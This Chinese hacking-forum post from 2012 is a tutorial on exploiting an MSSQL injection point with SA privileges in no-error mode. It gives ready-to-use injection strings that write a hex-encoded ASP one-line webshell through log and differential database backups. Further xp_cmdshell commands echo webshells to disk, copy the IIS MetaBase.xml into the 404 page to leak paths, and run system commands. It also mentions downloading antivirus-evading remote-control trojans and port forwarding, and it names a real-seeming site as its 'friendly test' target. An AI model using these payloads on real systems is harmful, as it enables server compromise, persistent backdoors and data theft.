找回密码
 立即注册
查看: 2953|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
7 Z2 I5 _1 F5 q/ ~, E3 D0 V! z/ c" T: c4 E& p9 f( w

8 h' Q" t+ E# W; B                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
' D8 h2 b- f( N% o0 T6 {
2 u4 O- y& ?# a% p7 p' E: V                                                                 
7 Y* z' u# n1 i+ `1 v9 z# R                                                                 
+ |1 I; s6 q: m5 {                                                                  论坛: http://www.90team.net/
  z/ X3 M" q& \  Y6 [3 D, `5 ?" ^+ o3 v1 k; f# n4 Q
& G2 h3 E. W6 U7 Y
7 e0 T% {. ^4 E
友情检测国家人才网& Z4 w* ]3 e# \% I+ i- K( J

- N. g  R# P4 L% Y6 N  T% j0 ~! O; M/ G, @
内容:MSSQL注入SA权限不显错模式下的入侵! Z1 l0 a$ t% O) E' W

/ M9 p0 p5 `5 |8 \5 X7 b: R, H+ N0 |
" I/ m) {, W4 W5 T3 n+ o一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。2 U8 M/ X. @6 E4 f% {) c: |

, M* B4 |8 }- L! s我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。* o& }8 D5 D" m! Y9 E2 T

3 i) [2 R9 e- U) m+ Z4 h/ `7 q( N. n0 S+ u% p* D. c; j
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
. L6 l  l. Z& U* A# r  H/ q1 r/ x0 k( O% n$ Q# N
思路:
2 L; g! ]9 R4 b' B: l! s
/ i3 F6 t3 c. L! k/ ^. ?* Z首先:$ T$ I; Z- `. k# e
' }4 ^8 o% x& [( K  U% X) F
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
' T$ ~& |! u# l4 h7 r( B& O3 M6 I+ u; ~* b/ Y' D3 N$ O; y
1.日志备份获得Webshell# ?+ O( e% z. q/ F2 }! E

; P" C5 M# @1 h, i2.数据库差异备份获得Webshell
  R+ J! u& B0 v; R( N* {, ^" n. y% g  L+ m1 d% M6 n% x5 _3 {) [
4.直接下载免杀远控木马。
" @3 F, Y4 ~6 M+ Q: i2 x/ F6 B5 Q# @) V7 W" W
5.直接下载LCX将服务器端口转发出来6 A2 w9 E8 H. i" D: W, x
* ~7 d8 N+ ~3 V' w' a5 ]' v  j
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。# }* Y) x9 `$ R

7 ?/ X- r# u, M& h/ u. C* }. l( e1 W# s* z/ f' U& S
! ], G; T) @, Q+ h* T( |$ v
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
! C) L% E) p; _; u+ y  B" N
4 P. k+ O- c2 b: O. ^; ~我直接演示后面一个方法# r0 r9 z. s* T) _$ C

# _. G& E( n, n) i
8 \2 }6 Y% N' s/ u8 m; M分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL % Q+ I. P4 e+ W
# L4 i7 D0 S; T8 m
" {/ b! j) U3 J% ~' ?. C

# i* e) F' t6 {% t' m% _4 O' {8 g- a$ [6 J5 A" _
◆日志备份:3 P# l% G" m  g1 M% k/ ?( W: }; p
" a1 r- r% `3 Q! _' _+ p

/ p$ k- O1 w  `5 ~+ E7 l8 `1. 进行初始备份0 S, l' ?- k8 ^
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--. s  m! ]4 b9 P
8 S8 s. e1 D' ~, u0 e
2. 插入数据
5 J% l1 b1 y& @4 p;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
1 X5 e1 \1 N, a  G
( ^! k( q9 p+ _. x0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>' U5 c6 O: v: G0 O6 i- m4 P
  
6 b8 j6 ]5 R' q5 }: B. C3. 备份并获得文件,删除临时表, m; q, Y* f# T' I3 C( @
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
1 g8 q! i" y. u7 n- r, t4 e7 p0 {* z+ L& O$ h3 ~

. E# f: O: v" U6 a! u/ A8 D+ F" X9 o. X
◆数据库差异备份4 `4 t. x' b: R# W& G" S3 R

4 L5 e! g7 H% s; B: s(1. 进行差异备份准备工作, k: i, }- }% A
$ h* k1 {# K+ c5 B" i* s
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
: Y$ j' @% ~2 M$ i" L2 U( T0 A; `/ [1 }. a4 o7 w! U. y* H" t  J
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
; J: [* V8 s3 v) Q; y* ]$ x + a$ ]7 m: F; ^9 ?" \- Q2 {9 [. ], ~

5 p3 w' b9 o0 H(2. 将数据写入到数据库
( G1 Q" b% g( z# p;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 4 @( C/ P4 b$ l6 B) h& T" i5 o

% z+ H) {. [8 }6 O0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
" l8 k2 m; S$ L
! [0 g8 W+ h+ l& f+ p* ~4 \' v3. 备份数据库并清理临时文件
$ _1 U' G+ Q2 D: ?: U* B2 k! u6 I( c( t& B4 p4 Z8 N. d" n7 O5 j
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--3 Z( i3 m6 V! d' y4 Q, R

+ S) i1 ~& c7 U% R+ l0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ) ~$ n9 f6 ]% f6 D0 E: D
# t4 p- i! J" z. o" d9 }. @

* a7 b+ H. l4 u; p; L7 k
; ]: ?; C. _" _+ C; a) q用^转义字符来写ASP(一句话木马)文件的方法:   
: a! Z3 H. Y3 I$ h' T3 \4 C  b+ n4 }& z" w6 ^( _3 b! o) A
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
, f- q3 J- K0 f/ J  s8 ]+ @
: G- L5 v4 C  S) c2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp - v: F% z3 s5 k$ Z5 r; y

7 D$ P, F6 T& }' o$ G/ {, v读取IIS配置信息获取web路径
1 x6 Q: B1 B% |) [, a% e1 E  W  T: }; F( l5 a9 Z! f" M
     
7 K; d+ N3 f6 A5 ~- |- e# B     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
1 q7 B* m3 X% `* f. x- L2 j) Y$ T, G( n2 q/ e7 t3 L: n# k) {4 `/ M
执行命令
$ Y3 ?- [) ]4 s1 F4 x, d     - d5 ]; s6 O) W3 {
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--; H7 d/ C8 _+ W/ ^
% y0 ]5 b3 ?0 t) V. K1 w
; d1 g! \3 E  n2 N% p

+ D% S9 h5 f. d  u+ b* P7 x1 o" v/ f; z( S9 u5 z# ]) J
" I7 @6 D# K8 l/ `4 b+ s

6 G0 D  f1 x+ t0 }7 d, I, M( E: B0 ?
( A5 S* h6 s$ U$ a' H" f

: }* X) z' V" h8 |5 T' `# L
8 g+ |# v# p- p8 t
  i  A3 M7 l/ A/ F
5 V& @  B% j8 M: h
, [5 S6 r) Q/ o! C2 _& l( V3 \9 Z2 T+ k# U* T8 m
5 L& ?6 V' Z7 Y) V5 R+ e
" o2 r& M  I' M! ~( q# b
$ S+ O8 y- s- T

% Y6 q  J0 O3 l) c( {
9 n, j( [2 B( P2 ^* f' P5 g+ e" Z$ G, v7 E1 b* A. ?4 [0 ~/ y

/ S% ~  |5 c! ?2 f. ]) P
+ Q2 X" M/ n' e, O  T+ ~
5 ]- Y/ u5 E9 |: |; x9 n1 _# V, }; s# X! m! y: X! ~

7 g1 b  F! x6 Y0 e9 M) f& d  H; c0 p

6 R/ t2 @. o+ B7 W6 r: o% c3 t/ h$ `( x/ ]; w

. {, B$ n, e( `. `6 n
6 G6 Z3 D; \% e8 c; ?3 C& `/ E+ b, q' A5 N% O
& x% S" J, d; E  B% @& J9 X
8 f, X/ ]: a! a$ g  g0 V  Z

( X' L: D. e2 U& D  R5 j6 P- x
  G8 a7 Y1 s/ f* r
' B6 |* k- k$ _
' a. f$ b* H+ `5 }9 M. G9 C) V" l) {* G/ I$ e; U
/ V" K( |5 Q6 t2 K" T$ g1 G

. H4 i( \7 O; m) B4 d- Z1 m& D8 F: _( ]
' x% @& {: q6 b) T- ~! E

2 k$ {7 ]% O% }) g/ y
; [# }1 h* v) C
' d* w: l; S" r1 Q' d9 p0 P$ |9 M
  S( X5 v9 ^3 I; ?5 J* K8 d) l3 u4 u- i0 Q( s' |  W1 l
: J5 n4 u/ Z$ Q0 B% A3 E( g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表